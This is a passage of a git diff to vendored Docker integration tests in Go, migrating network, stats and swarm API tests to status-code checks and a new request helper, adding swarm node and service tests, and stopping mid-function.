"github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -34,7 +36,7 @@ func (s *DockerSuite) TestAPINetworkCreateDelete(c *check.C) { CheckDuplicate: true, }, } - id := createNetwork(c, config, true) + id := createNetwork(c, config, http.StatusCreated) c.Assert(isNetworkAvailable(c, name), checker.Equals, true) // delete the network and make sure it is deleted @@ -59,14 +61,25 @@ func (s *DockerSuite) TestAPINetworkCreateCheckDuplicate(c *check.C) { } // Creating a new network first - createNetwork(c, configOnCheck, true) + createNetwork(c, configOnCheck, http.StatusCreated) c.Assert(isNetworkAvailable(c, name), checker.Equals, true) // Creating another network with same name and CheckDuplicate must fail - createNetwork(c, configOnCheck, false) + isOlderAPI := versions.LessThan(testEnv.DaemonAPIVersion(), "1.34") + expectedStatus := http.StatusConflict + if isOlderAPI { + // In the early test code it uses bool value to represent + // whether createNetwork() is expected to fail or not. + // Therefore, we use negation to handle the same logic after + // the code was changed in https://github.com/moby/moby/pull/35030 + // -http.StatusCreated will also be checked as NOT equal to + // http.StatusCreated in createNetwork() function. + expectedStatus = -http.StatusCreated + } + createNetwork(c, configOnCheck, expectedStatus) // Creating another network with same name and not CheckDuplicate must succeed - createNetwork(c, configNotCheck, true) + createNetwork(c, configNotCheck, http.StatusCreated) } func (s *DockerSuite) TestAPINetworkFilter(c *check.C) { @@ -75,7 +88,7 @@ func (s *DockerSuite) TestAPINetworkFilter(c *check.C) { c.Assert(nr.Name, checker.Equals, "bridge") } -func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { +func (s *DockerSuite) TestAPINetworkInspectBridge(c *check.C) { testRequires(c, DaemonIsLinux) // Inspect default bridge network nr := getNetworkResource(c, "bridge") @@ -93,13 +106,15 @@ func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { c.Assert(nr.Internal, checker.Equals, false) c.Assert(nr.EnableIPv6, checker.Equals, false) c.Assert(nr.IPAM.Driver, checker.Equals, "default") - c.Assert(len(nr.Containers), checker.Equals, 1) c.Assert(nr.Containers[containerID], checker.NotNil) ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) c.Assert(err, checker.IsNil) c.Assert(ip.String(), checker.Equals, containerIP) +} +func (s *DockerSuite) TestAPINetworkInspectUserDefinedNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) // IPAM configuration inspect ipam := &network.IPAM{ Driver: "default", @@ -113,10 +128,10 @@ func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { Options: map[string]string{"foo": "bar", "opts": "dopts"}, }, } - id0 := createNetwork(c, config, true) + id0 := createNetwork(c, config, http.StatusCreated) c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, true) - nr = getNetworkResource(c, id0) + nr := getNetworkResource(c, id0) c.Assert(len(nr.IPAM.Config), checker.Equals, 1) c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16") c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24") @@ -136,7 +151,7 @@ func (s *DockerSuite) TestAPINetworkConnectDisconnect(c *check.C) { config := types.NetworkCreateRequest{ Name: name, } - id := createNetwork(c, config, true) + id := createNetwork(c, config, http.StatusCreated) nr := getNetworkResource(c, id) c.Assert(nr.Name, checker.Equals, name) c.Assert(nr.ID, checker.Equals, id) @@ -184,7 +199,7 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { IPAM: ipam0, }, } - id0 := createNetwork(c, config0, true) + id0 := createNetwork(c, config0, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test0"), checker.Equals, true) ipam1 := &network.IPAM{ @@ -199,7 +214,11 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { IPAM: ipam1, }, } - createNetwork(c, config1, false) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + createNetwork(c, config1, http.StatusInternalServerError) + } else { + createNetwork(c, config1, http.StatusForbidden) + } c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, false) ipam2 := &network.IPAM{ @@ -214,20 +233,20 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { IPAM: ipam2, }, } - createNetwork(c, config2, true) + createNetwork(c, config2, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test2"), checker.Equals, true) // remove test0 and retry to create test1 deleteNetwork(c, id0, true) - createNetwork(c, config1, true) + createNetwork(c, config1, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, true) // for networks w/o ipam specified, docker will choose proper non-overlapping subnets - createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test3"), checker.Equals, true) - createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test4"), checker.Equals, true) - createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test5"), checker.Equals, true) for i := 1; i < 6; i++ { @@ -236,7 +255,7 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { } func (s *DockerSuite) TestAPICreateDeletePredefinedNetworks(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SwarmInactive) createDeletePredefinedNetwork(c, "bridge") createDeletePredefinedNetwork(c, "none") createDeletePredefinedNetwork(c, "host") @@ -250,18 +269,28 @@ func createDeletePredefinedNetwork(c *check.C, name string) { CheckDuplicate: true, }, } - shouldSucceed := false - createNetwork(c, config, shouldSucceed) - deleteNetwork(c, name, shouldSucceed) + expectedStatus := http.StatusForbidden + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.34") { + // In the early test code it uses bool value to represent + // whether createNetwork() is expected to fail or not. + // Therefore, we use negation to handle the same logic after + // the code was changed in https://github.com/moby/moby/pull/35030 + // -http.StatusCreated will also be checked as NOT equal to + // http.StatusCreated in createNetwork() function. + expectedStatus = -http.StatusCreated + } + createNetwork(c, config, expectedStatus) + deleteNetwork(c, name, false) } func isNetworkAvailable(c *check.C, name string) bool { - status, body, err := sockRequest("GET", "/networks", nil) - c.Assert(status, checker.Equals, http.StatusOK) + resp, body, err := request.Get("/networks") c.Assert(err, checker.IsNil) + defer resp.Body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) - nJSON := []types.NetworkResource{} - err = json.Unmarshal(body, &nJSON) + var nJSON []types.NetworkResource + err = json.NewDecoder(body).Decode(&nJSON) c.Assert(err, checker.IsNil) for _, n := range nJSON { @@ -278,48 +307,59 @@ func getNetworkIDByName(c *check.C, name string) string { filterArgs = filters.NewArgs() ) filterArgs.Add("name", name) - filterJSON, err := filters.ToParam(filterArgs) + filterJSON, err := filters.ToJSON(filterArgs) c.Assert(err, checker.IsNil) v.Set("filters", filterJSON) - status, body, err := sockRequest("GET", "/networks?"+v.Encode(), nil) - c.Assert(status, checker.Equals, http.StatusOK) + resp, body, err := request.Get("/networks?" + v.Encode()) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(err, checker.IsNil) - nJSON := []types.NetworkResource{} - err = json.Unmarshal(body, &nJSON) + var nJSON []types.NetworkResource + err = json.NewDecoder(body).Decode(&nJSON) c.Assert(err, checker.IsNil) - c.Assert(len(nJSON), checker.Equals, 1) + var res string + for _, n := range nJSON { + // Find exact match + if n.Name == name { + res = n.ID + } + } + c.Assert(res, checker.Not(checker.Equals), "") - return nJSON[0].ID + return res } func getNetworkResource(c *check.C, id string) *types.NetworkResource { - _, obj, err := sockRequest("GET", "/networks/"+id, nil) + _, obj, err := request.Get("/networks/" + id) c.Assert(err, checker.IsNil) nr := types.NetworkResource{} - err = json.Unmarshal(obj, &nr) + err = json.NewDecoder(obj).Decode(&nr) c.Assert(err, checker.IsNil) return &nr } -func createNetwork(c *check.C, config types.NetworkCreateRequest, shouldSucceed bool) string { - status, resp, err := sockRequest("POST", "/networks/create", config) - if !shouldSucceed { - c.Assert(status, checker.Not(checker.Equals), http.StatusCreated) - return "" - } - +func createNetwork(c *check.C, config types.NetworkCreateRequest, expectedStatusCode int) string { + resp, body, err := request.Post("/networks/create", request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer resp.Body.Close() - var nr types.NetworkCreateResponse - err = json.Unmarshal(resp, &nr) - c.Assert(err, checker.IsNil) + if expectedStatusCode >= 0 { + c.Assert(resp.StatusCode, checker.Equals, expectedStatusCode) + } else { + c.Assert(resp.StatusCode, checker.Not(checker.Equals), -expectedStatusCode) + } + + if expectedStatusCode == http.StatusCreated || expectedStatusCode < 0 { + var nr types.NetworkCreateResponse + err = json.NewDecoder(body).Decode(&nr) + c.Assert(err, checker.IsNil) - return nr.ID + return nr.ID + } + return "" } func connectNetwork(c *check.C, nid, cid string) { @@ -327,8 +367,8 @@ func connectNetwork(c *check.C, nid, cid string) { Container: cid, } - status, _, err := sockRequest("POST", "/networks/"+nid+"/connect", config) - c.Assert(status, checker.Equals, http.StatusOK) + resp, _, err := request.Post("/networks/"+nid+"/connect", request.JSONBody(config)) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(err, checker.IsNil) } @@ -337,17 +377,18 @@ func disconnectNetwork(c *check.C, nid, cid string) { Container: cid, } - status, _, err := sockRequest("POST", "/networks/"+nid+"/disconnect", config) - c.Assert(status, checker.Equals, http.StatusOK) + resp, _, err := request.Post("/networks/"+nid+"/disconnect", request.JSONBody(config)) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(err, checker.IsNil) } func deleteNetwork(c *check.C, id string, shouldSucceed bool) { - status, _, err := sockRequest("DELETE", "/networks/"+id, nil) + resp, _, err := request.Delete("/networks/" + id) + c.Assert(err, checker.IsNil) + defer resp.Body.Close() if !shouldSucceed { - c.Assert(status, checker.Not(checker.Equals), http.StatusOK) + c.Assert(resp.StatusCode, checker.Not(checker.Equals), http.StatusOK) return } - c.Assert(status, checker.Equals, http.StatusNoContent) - c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusNoContent) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go deleted file mode 100644 index daf1b05d2e..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go +++ /dev/null @@ -1,44 +0,0 @@ -package main - -import ( - "net/http" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestResizeAPIResponse(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - - endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" - status, _, err := sockRequest("POST", endpoint, nil) - c.Assert(status, check.Equals, http.StatusOK) - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestResizeAPIHeightWidthNoInt(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - - endpoint := "/containers/" + cleanedContainerID + "/resize?h=foo&w=bar" - status, _, err := sockRequest("POST", endpoint, nil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestResizeAPIResponseWhenContainerNotStarted(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "true") - cleanedContainerID := strings.TrimSpace(out) - - // make sure the exited container is not running - dockerCmd(c, "wait", cleanedContainerID) - - endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" - status, body, err := sockRequest("POST", endpoint, nil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - c.Assert(err, check.IsNil) - - c.Assert(getErrorMessage(c, body), checker.Contains, "is not running", check.Commentf("resize should fail with message 'Container is not running'")) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go deleted file mode 100644 index 15a21e579f..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go +++ /dev/null @@ -1,39 +0,0 @@ -// +build !windows - -package main - -import ( - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func setPortConfig(portConfig []swarm.PortConfig) serviceConstructor { - return func(s *swarm.Service) { - if s.Spec.EndpointSpec == nil { - s.Spec.EndpointSpec = &swarm.EndpointSpec{} - } - s.Spec.EndpointSpec.Ports = portConfig - } -} - -func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) { - d := s.AddDaemon(c, true, true) - - // Create a service with a port mapping of 8080:8081. - portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}} - serviceID := d.createService(c, simpleTestService, setInstances(1), setPortConfig(portConfig)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) - - // Update the service: changed the port mapping from 8080:8081 to 8082:8083. - updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}} - remoteService := d.getService(c, serviceID) - d.updateService(c, remoteService, setPortConfig(updatedPortConfig)) - - // Inspect the service and verify port mapping. - updatedService := d.getService(c, serviceID) - c.Assert(updatedService.Spec.EndpointSpec, check.NotNil) - c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1) - c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083)) - c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go index 23fbdbb740..3954e4b2e0 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go @@ -1,6 +1,7 @@ package main import ( + "context" "encoding/json" "fmt" "net/http" @@ -13,19 +14,20 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) var expectedNetworkInterfaceStats = strings.Split("rx_bytes rx_dropped rx_errors rx_packets tx_bytes tx_dropped tx_errors tx_packets", " ") func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;do echo 'Hello'; usleep 100000; done") + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;usleep 100; do echo 'Hello'; done") id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id)) c.Assert(err, checker.IsNil) c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") @@ -37,7 +39,7 @@ func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) { var cpuPercent = 0.0 - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { cpuDelta := float64(v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage) systemDelta := float64(v.CPUStats.SystemUsage - v.PreCPUStats.SystemUsage) cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 @@ -64,7 +66,7 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { id := strings.TrimSpace(out) getGoRoutines := func() int { - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/info"), nil, "") + _, body, err := request.Get(fmt.Sprintf("/info")) c.Assert(err, checker.IsNil) info := types.Info{} err = json.NewDecoder(body).Decode(&info) @@ -75,7 +77,7 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { // When the HTTP connection is closed, the number of goroutines should not increase. routines := getGoRoutines() - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats", id), nil, "") + _, body, err := request.Get(fmt.Sprintf("/containers/%s/stats", id)) c.Assert(err, checker.IsNil) body.Close() @@ -97,13 +99,13 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) { testRequires(c, SameHostDaemon) - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) // Retrieve the container address net := "bridge" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { net = "nat" } contIP := findContainerIP(c, id, net) @@ -151,21 +153,21 @@ func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) { // On Linux, account for ARP. expRxPkts := preRxPackets + uint64(numPings) expTxPkts := preTxPackets + uint64(numPings) - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { expRxPkts++ expTxPkts++ } c.Assert(postTxPackets, checker.GreaterOrEqualThan, expTxPkts, check.Commentf("Reported less TxPackets than expected. Expected >= %d. Found %d. %s", expTxPkts, postTxPackets, pingouts)) c.Assert(postRxPackets, checker.GreaterOrEqualThan, expRxPkts, - check.Commentf("Reported less Txbytes than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts)) + check.Commentf("Reported less RxPackets than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts)) } func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) { // Windows doesn't support API versions less than 1.25, so no point testing 1.17 .. 1.21 testRequires(c, SameHostDaemon, DaemonIsLinux) - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) wg := sync.WaitGroup{} @@ -191,7 +193,7 @@ func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) { func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats { var st *types.StatsJSON - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + _, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id)) c.Assert(err, checker.IsNil) err = json.NewDecoder(body).Decode(&st) @@ -208,7 +210,7 @@ func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats { func getVersionedStats(c *check.C, id string, apiVersion string) map[string]interface{} { stats := make(map[string]interface{}) - _, body, err := sockRequestRaw("GET", fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id), nil, "") + _, body, err := request.Get(fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id)) c.Assert(err, checker.IsNil) defer body.Close() @@ -260,30 +262,32 @@ func jsonBlobHasGTE121NetworkStats(blob map[string]interface{}) bool { func (s *DockerSuite) TestAPIStatsContainerNotFound(c *check.C) { testRequires(c, DaemonIsLinux) - - status, _, err := sockRequest("GET", "/containers/nonexistent/stats", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + defer cli.Close() - status, _, err = sockRequest("GET", "/containers/nonexistent/stats?stream=0", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) + expected := "No such container: nonexistent" + + _, err = cli.ContainerStats(context.Background(), "nonexistent", true) + c.Assert(err.Error(), checker.Contains, expected) + _, err = cli.ContainerStats(context.Background(), "nonexistent", false) + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestAPIStatsNoStreamConnectedContainers(c *check.C) { testRequires(c, DaemonIsLinux) - out1, _ := runSleepingContainer(c) + out1 := runSleepingContainer(c) id1 := strings.TrimSpace(out1) c.Assert(waitRun(id1), checker.IsNil) - out2, _ := runSleepingContainer(c, "--net", "container:"+id1) + out2 := runSleepingContainer(c, "--net", "container:"+id1) id2 := strings.TrimSpace(out2) c.Assert(waitRun(id2), checker.IsNil) - ch := make(chan error) + ch := make(chan error, 1) go func() { - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id2), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id2)) defer body.Close() if err != nil { ch <- err diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go deleted file mode 100644 index 0995ce3833..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - "fmt" - "net/http" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestAPIStatsContainerGetMemoryLimit(c *check.C) { - testRequires(c, DaemonIsLinux, memoryLimitSupport) - - resp, body, err := sockRequestRaw("GET", "/info", nil, "application/json") - c.Assert(err, checker.IsNil) - c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) - var info types.Info - err = json.NewDecoder(body).Decode(&info) - c.Assert(err, checker.IsNil) - body.Close() - - // don't set a memory limit, the memory limit should be system memory - conName := "foo" - dockerCmd(c, "run", "-d", "--name", conName, "busybox", "top") - c.Assert(waitRun(conName), checker.IsNil) - - resp, body, err = sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", conName), nil, "") - c.Assert(err, checker.IsNil) - c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) - c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") - - var v *types.Stats - err = json.NewDecoder(body).Decode(&v) - c.Assert(err, checker.IsNil) - body.Close() - c.Assert(fmt.Sprintf("%d", v.MemoryStats.Limit), checker.Equals, fmt.Sprintf("%d", info.MemTotal)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go new file mode 100644 index 0000000000..191391620d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go @@ -0,0 +1,127 @@ +// +build !windows + +package main + +import ( + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + nodes := d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + +loop0: + for _, n := range nodes { + for _, d := range []*daemon.Daemon{d1, d2, d3} { + if n.ID == d.NodeID() { + continue loop0 + } + } + c.Errorf("unknown nodeID %v", n.ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + nodes := d.ListNodes(c) + + d.UpdateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + n := d.GetNode(c, nodes[0].ID) + c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) { + testRequires(c, Network) + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + _ = s.AddDaemon(c, true, false) + + nodes := d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + + // Getting the info so we can take the NodeID + d2Info := d2.SwarmInfo(c) + + // forceful removal of d2 should work + d1.RemoveNode(c, d2Info.NodeID, true) + + nodes = d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) + + // Restart the node that was removed + d2.Restart(c) + + // Give some time for the node to rejoin + time.Sleep(1 * time.Second) + + // Make sure the node didn't rejoin + nodes = d1.ListNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + // start a service, expect balanced distribution + instances := 8 + id := d1.CreateService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) + + // drain d2, all containers should move to d1 + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityDrain + }) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 0) + + // set d2 back to active + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityActive + }) + + instances = 1 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) + + instances = 8 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + + // drained node first so we don't get any old containers + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) + + d2ContainerCount := len(d2.ActiveContainers(c)) + + // set d2 to paused, scale service up, only d1 gets new tasks + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + instances = 14 + d1.UpdateService(c, d1.GetService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances-d2ContainerCount) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, d2ContainerCount) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go new file mode 100644 index 0000000000..1a826c99c6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go @@ -0,0 +1,612 @@ +// +build !windows + +package main + +import ( + "context" + "fmt" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" + "github.com/go-check/check" + "golang.org/x/sys/unix" + "gotest.tools/icmd" +) + +func setPortConfig(portConfig []swarm.PortConfig) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.EndpointSpec == nil { + s.Spec.EndpointSpec = &swarm.EndpointSpec{} + } + s.Spec.EndpointSpec.Ports = portConfig + } +} + +func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service with a port mapping of 8080:8081. + portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}} + serviceID := d.CreateService(c, simpleTestService, setInstances(1), setPortConfig(portConfig)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + // Update the service: changed the port mapping from 8080:8081 to 8082:8083. + updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}} + remoteService := d.GetService(c, serviceID) + d.UpdateService(c, remoteService, setPortConfig(updatedPortConfig)) + + // Inspect the service and verify port mapping. + updatedService := d.GetService(c, serviceID) + c.Assert(updatedService.Spec.EndpointSpec, check.NotNil) + c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083)) + c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082)) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) { + d := s.AddDaemon(c, true, true) + + services := d.ListServices(c) + c.Assert(services, checker.NotNil) + c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services)) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.CreateService(c, simpleTestService, 